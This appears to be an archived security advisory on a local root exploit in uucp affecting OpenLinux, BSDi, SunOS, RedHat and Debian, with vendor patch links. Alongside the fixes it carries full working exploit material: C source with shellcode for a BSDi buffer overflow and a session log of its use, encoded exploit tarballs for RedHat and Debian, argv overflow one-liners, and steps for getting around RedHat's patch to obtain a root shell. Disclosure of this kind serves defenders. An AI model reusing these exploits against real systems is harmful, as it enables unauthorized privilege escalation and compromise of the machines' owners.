14th Jan 2003 [SBWID-4739]
COMMAND
uucp bad argument handling leads to local root exploit
SYSTEMS AFFECTED
OpenLinux 2.3
OpenLinux eServer 2.3.1
OpenLinux eDesktop 2.4
BSDI BSD/OS 4.0.1
BSDI BSD/OS 3.0
SunOS 5.8
PROBLEM
Zen Parse found following, as published in Caldera advisory
CSSA-2001-033.0.
There is a argument handling problem which allows a local attacker to gain
access to the uucp group. Using this access the attacker could use badly
written scripts to gain access to the root account.
Update
======
izik @ http://www.tty64.org added :
buffer overflow is based on command line argv. for ex:
/usr/bin/uucp `perl -e 'print "A" x 900'` `perl -e 'print "A" x 900'`
`perl -e 'print "A" x 356'`
Update 2
=========
zen-parse produced following exploit for RedHat:
---1463783680-1077295494-1006678534=:26122
Content-Type: APPLICATION/X-GZIP; NAME="redhat7.0-uucp-to-root.tar.gz"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description: redhat root via uucp exploit
Content-Disposition: ATTACHMENT; FILENAME="redhat7.0-uucp-to-root.tar.gz"
H4sIAFWtADwAA+1Y+2/bNhDOz/wrrmlRJ1308jNw0wLF1iAFiraoEzTbXKCy
RFtaJFIgKcdO2/99pB6WLdtJBhgGhvJzIkX3II+8T3d0GPYDV/RM20hTLzEE
NRilwjrYJWy7bfd6PXm35d1euRc4sHtt23aa3XZH2jmdTqt7AJ2dRrEFKRcu
Azi4w8RIXMbxFruH9P9TsM35x7PEwCw2ebCDOWxH5rvT2Zb/VrfZWuS/2WpK
+15b5d/ewdwP4hfP/9Mn1igkFg8Q9gIKFAZYiJBMIE2Ai3Q8Rn+DMQMr5Swz
TFPixhi+wo8fcASZzww+MTpyR9EcCAVFIwiJ3NUowr4JLwHPQgEOHKPLi3eD
i4+Dy1ffilGM6Bvi2Adu/VnAelYaWRN4bU1dZok4sVhKRBByODv78vb83bWy
QZ4rliymU3Mq1W8/nqMkHfkhAwsR6uNsnmk5PComrgQRnYzDCMNioKsrKUIy
fLEqLyXIx6O05pOmmRCl5IbQWwIejWOX+BzevH9fPkjyiGDh0s8vxa721QXx
Oa9NmQuQH7rRqqaUoISyWpylBKmtyDdpXVnulHwEH4/dNBJIzBMMSZhgVERc
uU2wUGldGnItkmJETxYTI2F0wty48h//gzHb5F0uOXeO52vJ8dzI4FjFUjww
7OFwKteLRChtXTJX+yZwDAuvJKAEQ7vXa3VPOxUbNod2z9LGlCZmRuc8vCvA
0zDKLuj3nOfGFzAMj5JxOHm1SsWVUZr5MGWETzIlTyiNLKWo2H9typ/y6brl
tFrbAmtuj+wxa8NxIuaF9yaiFK6FRVUksjuLwRhXti73DR7gKIJcrfZlSc2D
e0yDmPrwG99ooWZetpqtr6xOp8D0Si65ITk6Rt8RcCwYnoT+kXTK7scnhnP8
slCkhSJdUuAZ9qKjw2LNhyeH6mJLzc9irzww6OYFqghkkZlB47H8yDNRZ4Q5
kOUmrepi478NWlH3kVSTTOs1qhZABIgAV3WsD4MI40T1habcNzm5z03ElQya
pdvnlBBloTyzFJrIq4oIkqzJ8qNiewGLSrQoIGUtyFaS70pZ9st0561onSpf
4fnzTXLZo7LYGjM4d8OsHQ0oY3Ozcf9QmROLa01h4wwbhKjqUVvoW6wLKaKt
S/fa/7ec/7IH9dcuToAPnP/srtNbPf815Z/6/LcXVKV9qarLVntjxe4NvpXc
CLmpnlFEwOD5QZAHLsPSgKhfx5oNYfhs+P3Tm8uLYd8e9p3hT8nnuuhWsmn4
Wn5qcjlhXZTVq7rQY5TUZYqhwzMZhOmYk7t7gp/chbJwemMwZLtQL5uKRrYK
UAX9BZSf2mmlaIoL4Vo73NDqsjdZDp6XgqrBrcrzs1JZF6pZ957/Le+/rEXx
zpj+0PvvdJzq+78jvws63Y5U6/d/D6i4/BQGYZzIBnzrzkFQ1XRBcQEogc8X
kiEncM5C+ECn0GyBc9pv2f32KXz4649LUAUbmUv/NYAzMFeayP6ZraGhoaGh
oaGhoaGhoaGhoaGhoaHxa+NfyDBC6wAoAAA=
---1463783680-1077295494-1006678534=:26122--
Vade 79 posted exploit for BSDi/4.0 :
-- usage start --
bash-2.02$ id
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9@fakehalo.deadpig.org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$
-- usage end --
-- bsdi_uucp.c start --
/* (BSDi)uucp[] family buffer overflow. by:
v9@fakehalo.deadpig.org. this yields
euid/egid/group=6(uucp) on BSDi/4.0
systems. (BSDi specific exploit)
*/
#define UUCP "/usr/bin/uucp"
#define UUPARAMS "/usr/sbin/uuparams"
#define UUNAME "/usr/bin/uuname"
#define FILLER "x"
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
"\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
"\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
"\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
void usage(char *progname){
printf("*** [syntax]: %s <-uucp|-uuparams|"
"-uuname>\n",progname);
exit(1);
}
long pointer(void){__asm__("movl %esp,%eax");}
int main(int ac,char **av){
unsigned short type=0;
unsigned int i=0;
long ret;
char eip[1024],buf[4096];
char *progptr;
printf("[ (BSDi/4.0)uucp*[]: family buffer o"
"verflow, by: v9@fakehalo.deadpig.org. ]\n");
if(ac>1){
if(!strncasecmp(av[1],"-uucp",5)){
progptr=UUCP;
type=1;
}
else if(!strncasecmp(av[1],"-uuparams",9)){
progptr=UUPARAMS;
type=0;
}
else if(!strncasecmp(av[1],"-uuname",7)){
progptr=UUNAME;
type=0;
}
else
usage(av[0]);
}
else
usage(av[0]);
ret=(pointer()+sizeof(buf));
eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
eip[i]=0x0;for(i=0;i<(sizeof(buf)-
strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf);
printf("*** [data]: return address: 0x%lx, p"
"rogram: %s.\n",ret,progptr);
if(execl(progptr,progptr,FILLER,
(type?FILLER:eip),(type?eip:0),0)){
printf("*** [error]: could not execute %s s"
"uccessfully.\n",progptr);
exit(1);
}
exit(0);
}
-- bsdi_uucp.c end --
Update (18th January 2002)
=======
Zen-Parse says about RedHat patch :
The patch does prevent the original exploit from working.
However, a trivial patch to the exploit I posted makes it work again.
local user -> uucp (via this problem) -> root (on some distributions,
via /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection
characters' issue.)
$ cd redhat7.0-uucp-to-root
$ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
$ mv tmp-exp-erm.sh exp-erm.sh
$ ./runme
and wait for /tmp/rootshell to appear.
Update (21 January 2002)
======
Exploit on Debian PowerPC unstable, by Charles Stevenson :
begin 644 debian-uucp.tar.gz
M'XL(`$B?2CP``^U7;6_;-A#.U_%77)6A<;+8EE]2#VT2M,A:M$/6!G6,IFB+
M5I9HBZU,"J3HV%O[WW>D)$M^2].AQ3!,!UFR>,>[X]W#XRF@0^;QNM9^W-SY
M0>2Z7;?7.\*GV^H=N>5G3CMNK]MN'[5ZW4YKQVVU>NW>#AS]*(?*I%7B28`=
M7TAZD]S7^/]1"DKYI[.X3N6DH<+O:\-MN6[O:&O^>V[GWDK^._>ZW1UPOZ\;
MF^E_GO_=.\TAXTT5DEVR"\,Y_$EY/?:DHG;@#Q&P$:.!X9R%GHRH@GY"IY0K
MP>'8!.7A4'RBPFOX8G)JYV@6@$XF,2">(L$2\'@`L5"*#:.YY4HA$F"C]"DD
MSDG_77.T%$OA4Z5`:JY`ZQD*@(&GU7TIQ4>/0R"HXGL)T-&(^@DD(861YG["
MT"DQLN+IM%DZBZH$-2/S-PMWN!#75%Z<P8!C]H<1)83ZH0!'X"*I_XGQL7'/
MJF$*F)&*(AHXY`W49]#42MJH:<V]"85W\/DSU,"JF,&%%$//K)2+3$,^O0$/
M,"88D!;LERQ*ZB7&8AZN$<,H.^3RZ;/^TQ?]RY,/F9EZ]($H7(9JOLZH^7,N
MU!S#:7/JR2;&O8F12T+T^_CXU>,GSZZ,#/&]I"0QG3:FR'[\X@F)]3!@$IJ$
MBX!:.]-</<D,%P.1&!OO8*%H,,`A@NM+EL?S$8+U1:_,T=H.$LT_<4PY('`F
M"!$%C\[/\Q>$8!(NIMQ/;UG8[YL;47.U8C(=(`'SHF5./D)B(5?\S$>("44:
MI'5F'BE\A8"./!TE))G'%&(64Y)Y7$P;T\3BM5"YYDFFT0^]I(YX'TMO4LP?
M?:14;IJ=+SF=/)FO)<?WHKJBQI?L15*?LBFNER0,93T^-W%+Z`06L^)0<`K=
M7J]S[]>C`@V;7;MA:2,AXH;%>^K>`.B41?9&SM*-4'\%];HO^(B=+"-Q24D[
MU9([>,<R52Q$U+2GU`+\5PV\\K>K3JO3V>97>[MCMUD:G<3)/)N]"2?9U$RB
MJ*CV*2=0'Q6RG@KJ*J11!"G;A*7$5N$-HN%$!/"+VBAA+)>E9NLK6T53V/!S
M*'F,U_;)7P04323%$EW#2?:Y?UAO[3_(&..,,2XQZ(SZ4<W)UNP<.N;F(N?+
M1@AK%;(EN[`P;,RYF:UQ_O_;U"?V>'B/&`O$9&&F>0`K#`('>-WV4$N%L8S'
M3*9'X;(Z3!J.*:%E(/0X1.$F(;N,^Q%6.CC&'6?K82,\+8\F$HO^\ICF3"6!
M&2.[6&@8;LS!X.SB_<6CRZ?@V/H7L6&Z#2RD&WAV1$Y)^&J;[&Q%]/+EB]\?
M/<^E\_@U;'X<0AA/P*+"_/'DV#\$K`@2#@[P9;IXH7P:[P.F#\QY68`&3D[`
MS1A(>-)=\UK)Y"&X>)G\9GS$[`J_BQUC*O#%W'(3&#:\:L:+-^Z[0\>LS]F_
M<_)\<'Y>�HF=+:(GB'UFOK;:&21HINT3E;J%S3>+5=H?E)Q+'DX!8`]:$N
M8#-"MPPC/E=FI7F!U6VT*E:N'F9[$V+ZI[U;%M^TS*V6VT8?H:N+GF/OFW06
MI\(MRSA6\=Y>T1SU*4_;NT63<!_Z$:6Q:9C:6"E,Q%3#(<H,0KO45D74XT9*
MQPMW'.(7YS3!RFQKH/'Q`!:'_>*,SH];NZ(T.'EGE5=\#'A>T=Z2U1PN7$F;
M5NN+F62:!0,Q@MA+^\GU>OX.6T5<-K?HLWK>DI\<$\:B]\S?-I2$!\X&^=FZ
M^&Q)&DOI,CQ/EZS=2FR62]ECR&SBKSIY@V39O\_K82)F"Q<A<F;PQ&.VT>X+
M*><(BQ$C)L]+_A:)>:FY38L!6)9/U-J`UT+C7Z$C_%2A$X$-E,WZ-28$YD+O
M240)=DV-_'M@4_[NWMTTCA\*UOC>JJN(^6^&`R[,]M_;XV.67WP#D#34NMP<
M9(@FIKZMC_[;7Z<5551111555%%%%5544445551111555%%%%?U3^ALU;SY*
$`"@`````
`
end
Update (14 January 2003)
======
hipnosis [hipnosis@softhome.net] reported for SunOS :
Buffer is overflow when the app uucp is executed with the parameter -s
continued of a string bigger than 7525 bytes.
hipnosis% uucp -s `perl -e 'print "A"x7526'`
Segmentation Fault
hipnosis% uucp -s `perl -e 'print "A"x7525'`
hipnosis%
SOLUTION
Workaround none
The proper solution is to upgrade to the latest packages.
Mandrake location of fixed packages
http://www.linux-mandrake.com/en/ftp.php3.
OpenLinux 2.3, Location of Fixed Packages
The upgrade packages can be found on Caldera\'s FTP site at: ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/RPMS
The corresponding source code package can be found at: ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/SRPMS
Verification
dd0f6e46374d62c349bf7a1f618a23a0 RPMS/uucp-1.06.2-8OL.i386.rpm
33b96ff362a261b87f73b2377fa20a5d RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux eServer 2.3.1 and OpenLinux eBuilder for ECential 3.0
Location of Fixed Packages
The upgrade packages can be found on Caldera\'s FTP site at:
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS
Verification
ee5c7f9bf1887d3c34f8c232b70a84b7 RPMS/uucp-1.06.2-8OL.i386.rpm
26f7f712e318c63a5deea1474a58e06f RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux eDesktop 2.4
Location of Fixed Packages
The upgrade packages can be found on Caldera\'s FTP site at:
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/SRPMS
Verification
1f00b87ce48e72d8a4bd754123d554d4 RPMS/uucp-1.06.2-8OL.i386.rpm
c00296b93945c8778c46252e975818d2 RPMS/uucp-doc-1.06.2-8OL.i386.rpm
e602cfba314e2519e2762bfecac9024c SRPMS/uucp-1.06.2-8OL.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8OL.i386.rpm \\
uucp-doc-1.06.2-8OL.i386.rpm
OpenLinux 3.1 Server
Location of Fixed Packages
The upgrade packages can be found on Caldera\'s FTP site at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS
Verification
4e3b47bc507d48bf9396e70c806d9a8e RPMS/uucp-1.06.2-8.i386.rpm
41cabb92a4eb86310d01c6a6b2f7453b RPMS/uucp-doc-html-1.06.2-8.i386.rpm
d06d2cd63b739895ebf82fa361266f16 RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
6f3e6037bd3839380f9a4104e55a9a73 SRPMS/uucp-1.06.2-8.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8.i386.rpm \\
uucp-doc-html-1.06.2-8.i386.rpm \\
uucp-doc-ps-1.06.2-8.i386.rpm
OpenLinux 3.1 Workstation
Location of Fixed Packages
The upgrade packages can be found on Caldera\'s FTP site at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS
The corresponding source code package can be found at:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS
Verification
4e3b47bc507d48bf9396e70c806d9a8e RPMS/uucp-1.06.2-8.i386.rpm
41cabb92a4eb86310d01c6a6b2f7453b RPMS/uucp-doc-html-1.06.2-8.i386.rpm
d06d2cd63b739895ebf82fa361266f16 RPMS/uucp-doc-ps-1.06.2-8.i386.rpm
6f3e6037bd3839380f9a4104e55a9a73 SRPMS/uucp-1.06.2-8.src.rpm
Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -Fvh uucp-1.06.2-8.i386.rpm \\
uucp-doc-html-1.06.2-8.i386.rpm \\
uucp-doc-ps-1.06.2-8.i386.rpm
Conectiva linux
ftp://atualizacoes.conectiva.com.br/4.0/i386/uucp-1.06.1-21U40_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/uucp-1.06.1-21U40_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/uucp-1.06.1-21U40_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/uucp-1.06.1-21U41_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/uucp-1.06.1-21U41_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/uucp-1.06.1-21U42_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/uucp-1.06.1-21U42_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/uucp-1.06.1-23U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/uucp-1.06.1-23U51_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/i386/uucp-1.06.2-4U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/uucp-1.06.2-4U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-cu-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/i386/uucp-doc-1.06.2-6U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/uucp-1.06.2-6U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/uucp-1.06.1-22U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/uucp-1.06.1-22U50_1cl.src.rpm
Update (21 January 2002)
======
RedHat posted a fix for the --config exploit :
Red Hat Linux 6.2:
SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/uucp-1.06.1-31.6x.src.rpm
alpha: ftp://updates.redhat.com/6.2/en/os/alpha/uucp-1.06.1-31.6x.alpha.rpm
i386: ftp://updates.redhat.com/6.2/en/os/i386/uucp-1.06.1-31.6x.i386.rpm
sparc: ftp://updates.redhat.com/6.2/en/os/sparc/uucp-1.06.1-31.6x.sparc.rpm
Red Hat Linux 7.0:
SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm
alpha: ftp://updates.redhat.com/7.0/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm
i386: ftp://updates.redhat.com/7.0/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm
Red Hat Linux 7.1:
SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/uucp-1.06.1-31.7.1.src.rpm
alpha: ftp://updates.redhat.com/7.1/en/os/alpha/uucp-1.06.1-31.7.1.alpha.rpm
i386: ftp://updates.redhat.com/7.1/en/os/i386/uucp-1.06.1-31.7.1.i386.rpm
ia64: ftp://updates.redhat.com/7.1/en/os/ia64/uucp-1.06.1-31.7.1.ia64.rpm
Red Hat Linux 7.2:
SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/uucp-1.06.1-32.src.rpm
i386: ftp://updates.redhat.com/7.2/en/os/i386/uucp-1.06.1-32.i386.rpm
ia64: ftp://updates.redhat.com/7.2/en/os/ia64/uucp-1.06.1-32.ia64.rpm
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
